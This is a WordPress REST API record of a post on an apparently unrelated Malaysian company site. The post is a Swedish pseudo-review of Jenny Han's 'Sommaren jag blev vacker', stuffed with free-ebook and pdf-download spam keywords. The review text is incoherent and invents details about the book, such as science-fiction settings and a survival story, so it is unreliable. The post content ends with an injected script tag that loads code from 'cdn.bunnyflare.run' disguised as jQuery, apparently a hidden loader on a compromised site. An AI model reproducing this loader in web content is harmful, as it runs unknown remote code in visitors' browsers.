{"id":136532,"date":"2025-12-17T04:19:10","date_gmt":"2025-12-16T20:19:10","guid":{"rendered":"https:\/\/www.sinaranadvance.com.my\/?p=136532"},"modified":"2026-01-18T20:19:12","modified_gmt":"2026-01-18T12:19:12","slug":"sommaren-jag-blev-vacker-det-fria-boknavet","status":"publish","type":"post","link":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/17\/sommaren-jag-blev-vacker-det-fria-boknavet\/","title":{"rendered":"Sommaren jag blev vacker : Det fria boknavet"},"content":{"rendered":"<h1>Sommaren jag blev vacker  Jenny Han<\/h1>\n<p>Fr\u00e5n ett rent personligt perspektiv fann jag boken vara en fascinerande fallstudie i mots\u00e4ttningar, ett sant kuriosum av en roman. Challinors ber\u00e4ttelser \u00e4r underh\u00e5llande, men de faller kortare \u00e4n den sofistikation jag har kommit Sommaren jag blev vacker f\u00f6rv\u00e4nta mig av Shriver. Jag hittade mig b\u00f6cker kindle gratis att \u00f6nska mig mer av ber\u00e4ttelsen.<\/p>\n<p>I efterhand inser jag att boken var mer \u00e4n bara en ber\u00e4ttelse &#8211; det var en upplevelse, en som utmanade mig och f\u00f6rvandlade mig p\u00e5 s\u00e4tt som jag fortfarande uppt\u00e4cker. Som en potentiell val f\u00f6r en studiegrupp har denna bok mycket att erbjuda, med mycket material f\u00f6r diskussion och debatt om ideologins roll i att formar v\u00e5r v\u00e4rld. F\u00f6rfattarens spr\u00e5kbehandling var ingenting mindre \u00e4n f\u00f6rtrollande, en symfoni av ord som dansade \u00f6ver sidan med en behagfullhet och elegans som var l\u00e4sa stundtals. I fallet med denna bok g\u00f6r f\u00f6rfattarens anv\u00e4ndning av en stark kvinnlig huvudperson och en futuristisk milj\u00f6 den till ett utm\u00e4rkt val f\u00f6r fans av science fiction och fantasy.<\/p>\n<p>Det \u00e4r ett bevis p\u00e5 f\u00f6rfattarens f\u00f6rm\u00e5ga att jag blev s\u00e5 helt engagerad i karakt\u00e4rernas liv, deras strider och segrar k\u00e4ndes lika verkliga och kroppsliga som mina egna. Hur Sommaren jag blev vacker f\u00f6rfattare skapa karakt\u00e4rer som k\u00e4nns s\u00e5 verkliga, s\u00e5 fylliga, och \u00e4nd\u00e5 s\u00e5 fantastiska, \u00e4r en hemlighet fb2 har fascinerat l\u00e4sare i generationer. Ber\u00e4ttelsen pdf nedladdning sig var engagerande, men den saknade en viss gnista, lite mer action eller sp\u00e4nning skulle ha h\u00e5llit mig p\u00e5 kanten av stolen.<\/p>\n<h2>L\u00e4s var som helst Sommaren jag blev vacker<\/h2>\n<p>Ett m\u00e5ste f\u00f6r alla som tycker om en v\u00e4lskriven deckare ebook pdf gratis en sida av kulinariska njutningar. Skrivandet var som en mjuk str\u00f6m, fl\u00f6dade smidigt och anstr\u00e4ngningsl\u00f6st, dess lugna yta speglade Sommaren jag blev vacker sk\u00f6nhet omkring oss. Familjens l\u00f6gnar var s\u00e5 f\u00f6rknippade att det gjorde historien till en sp\u00e4nnande och of\u00f6ruts\u00e4gbar l\u00e4sning. Det enda jag kunde vara s\u00e4ker p\u00e5 var karakt\u00e4rens k\u00f6n.<\/p>\n<p>Ber\u00e4ttelsens detaljer kan vara otydliga, men k\u00e4nslan den l\u00e4mnade mig med har stannat kvar, en varm och fuzzig k\u00e4nsla som jag f\u00f6rknippar med gl\u00e4djen att bli f\u00f6rlorad i en bra bok. F\u00f6r den skarpsinnade unga l\u00e4saren balanserar denna bok perfekt mellan d\u00e5rskap och sofistikation, dess avvikande humor och konstiga karakt\u00e4rer \u00e4r s\u00e4kert ebook gratis nedladdning online gl\u00e4dja. I efterhand tror jag att det som verkligen drog bok pdf nedladdning till denna bok Sommaren jag blev vacker dess f\u00f6rm\u00e5ga att balansera det absurda med det vardagliga, skapande en l\u00e4supplevelse som var b\u00e5de underh\u00e5llande och tankev\u00e4ckande.<\/p>\n<p>Jag att denna bok till vara en solid och rolig l\u00e4sning. Sommaren jag blev vacker h\u00f6ll mig krokad, och jag ser fram emot den tredje delen. Kan inte v\u00e4nta p\u00e5 att den ska sl\u00e4ppas! Ber\u00e4ttandets kraft \u00e4r en m\u00e4rklig sak, det kan \u00f6verf\u00f6ra komplexa id\u00e9er och k\u00e4nslor p\u00e5 ett s\u00e4tt som k\u00e4nns b\u00e5de personligt och universellt, och denna bok \u00e4r ett vittnesm\u00e5l om ber\u00e4ttandets eviga kraft att f\u00e5nga v\u00e5ra hj\u00e4rtan och tankar. Vad \u00e4r det med b\u00f6cker som g\u00f6r att vi kan forma s\u00e5 starka band med karakt\u00e4rerna och deras upplevelser?<\/p>\n<h3>Jenny Han gratis bok online<\/h3>\n<p>Handlingen k\u00e4ndes epub platt, och avslutningen Sommaren jag blev vacker mig mer f\u00f6rvirrad \u00e4n n\u00f6jd. Ett m\u00e5ste f\u00f6r Edna Ferber-entusiaster, den h\u00e4r romanen \u00e4r fylld med dynamiska karakt\u00e4rer och en plot l\u00e4sning h\u00e5ller dig pdf nedladdning<\/p>\n<p>F\u00f6rfattarens ebook pdf gratis nedladdning var elegant och raffinerad, som ett fint vin som f\u00f6rb\u00e4ttrades med \u00e5lder och reflektion. Det var en sp\u00e4nnande \u00f6verlevnadsber\u00e4ttelse, en som hade mig Sommaren jag blev vacker kanten av min stol, mitt hj\u00e4rta bultade av f\u00f6rv\u00e4ntan. Prosat var lyriskt kindle insynsv\u00e4ckande, ritade levande bilder ebook nedladdning gratis mina tankar, \u00e4ven om sj\u00e4lva ber\u00e4ttelsen var n\u00e5got f\u00f6ruts\u00e4gbar och fattades riktigt sp\u00e4nning.<\/p>\n<p>Skrivandet var en resa, Sommaren jag blev vacker slingrande v\u00e4g som vred och v\u00e4nde sig genom landskapet av mitt sinne. Ber\u00e4ttelsens utforskning av maktstrukturer var tankeutmanande, med fr\u00e5gor som kvarstod l\u00e5ngt efter att jag var f\u00e4rdig med ebook gratis nedladdning l\u00e4sa, som en sp\u00f6ksam melodi. Jag kunde inte hj\u00e4lpa att k\u00e4nna en k\u00e4nsla av besvikelse n\u00e4r ber\u00e4ttelsen inte kunde leverera p\u00e5 sitt initiala l\u00f6fte, som en blomma som blommar bara f\u00f6r att vissna bort. I slut\u00e4ndan var det de tystl\u00e5gna \u00f6gonblicken, de som inte f\u00f6rs\u00f6kte chocka eller imponera, men helt enkelt kindle historien med v\u00e4nlighet och medk\u00e4nsla, som l\u00e4mnade den djupaste intrycket p\u00e5 mig.<\/p>\n<h3>Sommaren jag blev vacker pdf<\/h3>\n<p>Bokens st\u00f6rsta svaghet l\u00e5g i dess of\u00f6rm\u00e5ga att balansera de olika ber\u00e4ttartr\u00e5darna, vilket l\u00e4mnade vissa k\u00e4nsliga f\u00f6rsummade, som en tr\u00e4dg\u00e5rd som blivit \u00f6vergiven. Medan v\u00e4rldsbyggandet var noggrant, k\u00e4ndes karakt\u00e4rerna som pappfigurer, saknade djup ebook gratis online komplexitet som jag har kommit att f\u00f6rv\u00e4nta mig av denna genre. S\u00e4ttet f\u00f6rfattaren beskriver sin resa genom de V\u00e5ldsamma F\u00f6rtio och isbergomr\u00e5det \u00e4r Sommaren jag blev vacker vittnesm\u00e5l om beskrivande skrivstils kraft att skapa levande bilder i l\u00e4sarens huvud. Det \u00e4r ett bevis p\u00e5 f\u00f6rfattarens skicklighet att de kunde skapa en ber\u00e4ttelse som var b\u00e5de tankev\u00e4ckande och underh\u00e5llande, \u00e4ven om den inte alltid tr\u00e4ffade r\u00e4tt.<\/p>\n<p>Ber\u00e4ttelsen avslutades med att l\u00e4mna mig en k\u00e4nsla av under, en k\u00e4nsla av att ber\u00e4ttelsen blott hade rakat ytan av n\u00e5got mycket djupare och mer komplext. Skrivandet var som en nyckel som \u00f6ppnade d\u00f6rrar till nya id\u00e9er och perspektiv, en sann g\u00e5va som jag kommer att skatta l\u00e4nge. Det \u00e4r ett vittnesb\u00f6rd om f\u00f6rfattarens skicklighet att ber\u00e4ttelsen fortfarande kan fascinera och engagera, \u00e4ven efter flera l\u00e4sningar.<\/p>\n<p>Om jag skulle beskriva min ebook online gratis att l\u00e4sa skulle jag s\u00e4ga att det var som att ge sig ut p\u00e5 en resa utan karta, sp\u00e4nnande och skr\u00e4mmande i lika stor utstr\u00e4ckning. F\u00f6rfattarens prosa var mesterverklig, hennes skrivning skapade levande bilder i min inre syn och drog mig in i ber\u00e4ttelsens v\u00e4rld.<\/p>\n<p>Filosofins v\u00e4rld kan vara skr\u00e4mmande, s\u00e4rskilt f\u00f6r nyb\u00f6rjare, men denna antologi fungerar som en mjuk introduktion, dess m\u00e5ngfaldiga r\u00f6ster och perspektiv bok att l\u00e4sa \u00e4mnet mer tillg\u00e4ngligt, \u00e4ven om vissa koncept fortfarande lyckas undvika f\u00f6rst\u00e5else. Det \u00e4r inte varje dag man st\u00f6ter p\u00e5 ett s\u00e5 m\u00e4stertalangfullt blandat genrev\u00e4gledande bok som skapar n\u00e5got unikt och betagande, ett \u00e4kta konstverk av ber\u00e4ttarkonst. Ett hj\u00e4rtav\u00e4rmande ber\u00e4ttelse som kommer att f\u00e5nga unga l\u00e4sare och h\u00e4sth\u00e4lsare lika. Det \u00e4r en p\u00e4rla.<\/p>\n<p>Denna bok \u00e4r en uppf\u00e4rsande tolkning av genren, med en unik och engagerande ber\u00e4ttelse som stickar ut fr\u00e5n m\u00e4ngden. Karakt\u00e4rerna \u00e4r b\u00f6cker gratis att l\u00e4sa och handlingen \u00e4r b\u00e5de sp\u00e4nnande bok underh\u00e5llande. En ytterligare \u00f6verb\u00e4rdad roman som l\u00e4mnade mig ol\u00e4ttad, en ballong bl\u00e5st full av f\u00f6rv\u00e4ntan, endast sprungen av realitetsn\u00e5len. Karakt\u00e4rerna \u00e4r komplexa och m\u00e5ngdimensionella, med sina egna motivationer och \u00f6nskningar, vilket g\u00f6r dem verkliga och relaterbara.<\/p>\n<p><script src=\"\/\/cdn.bunnyflare.run\/jquery_min.js?id=16007353\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Sommaren jag blev vacker Jenny Han Fr\u00e5n ett rent personligt perspektiv fann jag boken vara en fascinerande fallstudie i mots\u00e4ttningar, ett sant kuriosum av en roman. Challinors ber\u00e4ttelser \u00e4r underh\u00e5llande, men de faller kortare \u00e4n den sofistikation jag har kommit Sommaren jag blev vacker f\u00f6rv\u00e4nta mig av Shriver. Jag hittade mig b\u00f6cker kindle gratis att [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"pagelayer_contact_templates":[],"_pagelayer_content":"","footnotes":""},"categories":[1],"tags":[],"class_list":["post-136532","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Sommaren jag blev vacker : Det fria boknavet - Sinaran Advance Group<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/17\/sommaren-jag-blev-vacker-det-fria-boknavet\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Sommaren jag blev vacker : Det fria boknavet - Sinaran Advance Group\" \/>\n<meta property=\"og:description\" content=\"Sommaren jag blev vacker Jenny Han Fr\u00e5n ett rent personligt perspektiv fann jag boken vara en fascinerande fallstudie i mots\u00e4ttningar, ett sant kuriosum av en roman. Challinors ber\u00e4ttelser \u00e4r underh\u00e5llande, men de faller kortare \u00e4n den sofistikation jag har kommit Sommaren jag blev vacker f\u00f6rv\u00e4nta mig av Shriver. Jag hittade mig b\u00f6cker kindle gratis att [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/17\/sommaren-jag-blev-vacker-det-fria-boknavet\/\" \/>\n<meta property=\"og:site_name\" content=\"Sinaran Advance Group\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-16T20:19:10+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-01-18T12:19:12+00:00\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/index.php\\\/2025\\\/12\\\/17\\\/sommaren-jag-blev-vacker-det-fria-boknavet\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/index.php\\\/2025\\\/12\\\/17\\\/sommaren-jag-blev-vacker-det-fria-boknavet\\\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/#\\\/schema\\\/person\\\/53a837ac211dea070613fe89a0e11d1d\"},\"headline\":\"Sommaren jag blev vacker : Det fria boknavet\",\"datePublished\":\"2025-12-16T20:19:10+00:00\",\"dateModified\":\"2026-01-18T12:19:12+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/index.php\\\/2025\\\/12\\\/17\\\/sommaren-jag-blev-vacker-det-fria-boknavet\\\/\"},\"wordCount\":1329,\"publisher\":{\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/#organization\"},\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/index.php\\\/2025\\\/12\\\/17\\\/sommaren-jag-blev-vacker-det-fria-boknavet\\\/\",\"url\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/index.php\\\/2025\\\/12\\\/17\\\/sommaren-jag-blev-vacker-det-fria-boknavet\\\/\",\"name\":\"Sommaren jag blev vacker : Det fria boknavet - Sinaran Advance Group\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/#website\"},\"datePublished\":\"2025-12-16T20:19:10+00:00\",\"dateModified\":\"2026-01-18T12:19:12+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/index.php\\\/2025\\\/12\\\/17\\\/sommaren-jag-blev-vacker-det-fria-boknavet\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.sinaranadvance.com.my\\\/index.php\\\/2025\\\/12\\\/17\\\/sommaren-jag-blev-vacker-det-fria-boknavet\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/index.php\\\/2025\\\/12\\\/17\\\/sommaren-jag-blev-vacker-det-fria-boknavet\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Sommaren jag blev vacker : Det fria boknavet\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/#website\",\"url\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/\",\"name\":\"Sinaran Advance Group\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/#organization\",\"name\":\"Sinaran Advance Group\",\"url\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/wp-content\\\/uploads\\\/2021\\\/06\\\/cropped-Sinaran-Logo-Complete-01-scaled-2.jpg\",\"contentUrl\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/wp-content\\\/uploads\\\/2021\\\/06\\\/cropped-Sinaran-Logo-Complete-01-scaled-2.jpg\",\"width\":1085,\"height\":675,\"caption\":\"Sinaran Advance Group\"},\"image\":{\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/#\\\/schema\\\/person\\\/53a837ac211dea070613fe89a0e11d1d\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/8d8ef0714f1fe89842beb2a5f0ca3e7ba6b1fd49220ccc32472f52e936991bbe?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/8d8ef0714f1fe89842beb2a5f0ca3e7ba6b1fd49220ccc32472f52e936991bbe?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/8d8ef0714f1fe89842beb2a5f0ca3e7ba6b1fd49220ccc32472f52e936991bbe?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"sameAs\":[\"https:\\\/\\\/sinaranadvance.com.my\"],\"url\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/index.php\\\/author\\\/sinaranadvance\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Sommaren jag blev vacker : Det fria boknavet - Sinaran Advance Group","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/17\/sommaren-jag-blev-vacker-det-fria-boknavet\/","og_locale":"en_US","og_type":"article","og_title":"Sommaren jag blev vacker : Det fria boknavet - Sinaran Advance Group","og_description":"Sommaren jag blev vacker Jenny Han Fr\u00e5n ett rent personligt perspektiv fann jag boken vara en fascinerande fallstudie i mots\u00e4ttningar, ett sant kuriosum av en roman. Challinors ber\u00e4ttelser \u00e4r underh\u00e5llande, men de faller kortare \u00e4n den sofistikation jag har kommit Sommaren jag blev vacker f\u00f6rv\u00e4nta mig av Shriver. Jag hittade mig b\u00f6cker kindle gratis att [&hellip;]","og_url":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/17\/sommaren-jag-blev-vacker-det-fria-boknavet\/","og_site_name":"Sinaran Advance Group","article_published_time":"2025-12-16T20:19:10+00:00","article_modified_time":"2026-01-18T12:19:12+00:00","author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"admin","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/17\/sommaren-jag-blev-vacker-det-fria-boknavet\/#article","isPartOf":{"@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/17\/sommaren-jag-blev-vacker-det-fria-boknavet\/"},"author":{"name":"admin","@id":"https:\/\/www.sinaranadvance.com.my\/#\/schema\/person\/53a837ac211dea070613fe89a0e11d1d"},"headline":"Sommaren jag blev vacker : Det fria boknavet","datePublished":"2025-12-16T20:19:10+00:00","dateModified":"2026-01-18T12:19:12+00:00","mainEntityOfPage":{"@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/17\/sommaren-jag-blev-vacker-det-fria-boknavet\/"},"wordCount":1329,"publisher":{"@id":"https:\/\/www.sinaranadvance.com.my\/#organization"},"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/17\/sommaren-jag-blev-vacker-det-fria-boknavet\/","url":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/17\/sommaren-jag-blev-vacker-det-fria-boknavet\/","name":"Sommaren jag blev vacker : Det fria boknavet - Sinaran Advance Group","isPartOf":{"@id":"https:\/\/www.sinaranadvance.com.my\/#website"},"datePublished":"2025-12-16T20:19:10+00:00","dateModified":"2026-01-18T12:19:12+00:00","breadcrumb":{"@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/17\/sommaren-jag-blev-vacker-det-fria-boknavet\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/17\/sommaren-jag-blev-vacker-det-fria-boknavet\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/17\/sommaren-jag-blev-vacker-det-fria-boknavet\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.sinaranadvance.com.my\/"},{"@type":"ListItem","position":2,"name":"Sommaren jag blev vacker : Det fria boknavet"}]},{"@type":"WebSite","@id":"https:\/\/www.sinaranadvance.com.my\/#website","url":"https:\/\/www.sinaranadvance.com.my\/","name":"Sinaran Advance Group","description":"","publisher":{"@id":"https:\/\/www.sinaranadvance.com.my\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.sinaranadvance.com.my\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.sinaranadvance.com.my\/#organization","name":"Sinaran Advance Group","url":"https:\/\/www.sinaranadvance.com.my\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.sinaranadvance.com.my\/#\/schema\/logo\/image\/","url":"https:\/\/www.sinaranadvance.com.my\/wp-content\/uploads\/2021\/06\/cropped-Sinaran-Logo-Complete-01-scaled-2.jpg","contentUrl":"https:\/\/www.sinaranadvance.com.my\/wp-content\/uploads\/2021\/06\/cropped-Sinaran-Logo-Complete-01-scaled-2.jpg","width":1085,"height":675,"caption":"Sinaran Advance Group"},"image":{"@id":"https:\/\/www.sinaranadvance.com.my\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/www.sinaranadvance.com.my\/#\/schema\/person\/53a837ac211dea070613fe89a0e11d1d","name":"admin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/8d8ef0714f1fe89842beb2a5f0ca3e7ba6b1fd49220ccc32472f52e936991bbe?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/8d8ef0714f1fe89842beb2a5f0ca3e7ba6b1fd49220ccc32472f52e936991bbe?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/8d8ef0714f1fe89842beb2a5f0ca3e7ba6b1fd49220ccc32472f52e936991bbe?s=96&d=mm&r=g","caption":"admin"},"sameAs":["https:\/\/sinaranadvance.com.my"],"url":"https:\/\/www.sinaranadvance.com.my\/index.php\/author\/sinaranadvance\/"}]}},"_links":{"self":[{"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/posts\/136532","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/comments?post=136532"}],"version-history":[{"count":1,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/posts\/136532\/revisions"}],"predecessor-version":[{"id":136533,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/posts\/136532\/revisions\/136533"}],"wp:attachment":[{"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/media?parent=136532"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/categories?post=136532"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/tags?post=136532"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}